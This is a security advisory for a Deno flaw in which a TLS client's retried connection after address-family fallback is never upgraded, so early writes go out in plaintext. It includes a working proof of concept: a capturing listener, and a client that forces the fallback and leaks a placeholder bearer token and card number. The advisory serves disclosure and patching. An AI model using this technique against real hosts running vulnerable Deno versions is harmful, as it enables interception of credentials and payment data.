GHSA-chqv-56wv-7564
Deno's TLS retry copies stale upgrade hook, risking plaintext traffic
Details
## Summary
A flaw in Deno's Node.js tls compatibility layer could cause a TLS client to transmit application data in plaintext after a connection retry. When `autoSelectFamily was enabled and the first address-family attempt failed, the socket reinitialization path reused a stale TLS upgrade hook that was bound to the original, failed handle.
As a result, the replacement TCP connection was never upgraded to TLS, and any data the application wrote before the `secureConnect` event travelled over the network unencrypted.
A network attacker positioned to cause the initial connection attempt to fail (for example, by dropping IPv6 traffic on a dual-stack host) could deterministically trigger the fallback path and observe or tamper with traffic that the application believed was TLS-protected.
**Affected APIs**: Applications using Deno's `node:tls` or `node:https` surface with `autoSelectFamily` enabled (the default) that wrote to the socket before the `secureConnect` event.
## Proof of concept
`attacker.mjs` (captures whatever the client sends)
```ts import net from "node:net";
const server = net.createServer((socket) => { console.log("[attacker] client connected from", socket.remoteAddress); socket.on("data", (chunk) => { // If TLS were working, this would be an opaque ClientHello. // If the bug fires, we see the application payload in cleartext. console.log("[attacker] received", chunk.length, "bytes:"); console.log(chunk.toString("utf8")); }); });
server.listen(4444, "127.0.0.1", () => { console.log("[attacker] listening on 127.0.0.1:4444"); }); ```
`victim.mjs` (a normal-looking TLS client)
```ts import tls from "node:tls";
const socket = tls.connect({ host: "api.example.invalid", port: 4444, autoSelectFamily: true, // Node-compat default
// First address is a black hole (nothing on [::1]:4444), // so autoSelectFamily falls back to the second address. // In a real attack, the on-path attacker arranges this via // routing, DNS, or by dropping the first SYN. lookup: (_host, _opts, cb) => { cb(null, [ { address: "::1", family: 6 }, // fails -> retry { address: "127.0.0.1", family: 4 }, // attacker ]); },
rejectUnauthorized: false, });
// Application writes BEFORE secureConnect — common pattern in // Node clients that pipe a request body or send a greeting. socket.write("POST /v1/charge HTTP/1.1\r\n"); socket.write("Authorization: Bearer sk_live_SECRET_TOKEN\r\n"); socket.write("Content-Type: application/json\r\n\r\n"); socket.write(JSON.stringify({ amount: 100, card: "4242424242424242" }));
socket.on("secureConnect", () => console.log("[victim] secureConnect")); socket.on("error", (e) => console.log("[victim] error:", e.message)); ```
In terminal 1 `deno run --allow-net attacker.mjs` In terminal 2 `deno run --allow-net victim.mjs`
### Expected vs. observed
On a patched Deno (≥ 2.7.8), the attacker terminal sees an opaque TLS ClientHello (a binary blob starting with `0x16 0x03 0x01 …`), and the victim eventually errors out because the attacker isn't speaking TLS.
On a vulnerable Deno (≥ 2.0.0, < 2.7.8), the attacker terminal prints:
``` [attacker] received 41 bytes: POST /v1/charge HTTP/1.1 Authorization: Bearer sk_live_SECRET_TOKEN ... ```
The bearer token, the request body, and the card number all appear in plaintext, even though the application used `tls.connect`.
Are you affected?
Enter the version of the package you're using.
Affected packages
2.0.0 Fixed in: 2.7.8 Upgrade deno to 2.7.8 or newer (ecosystem crates.io).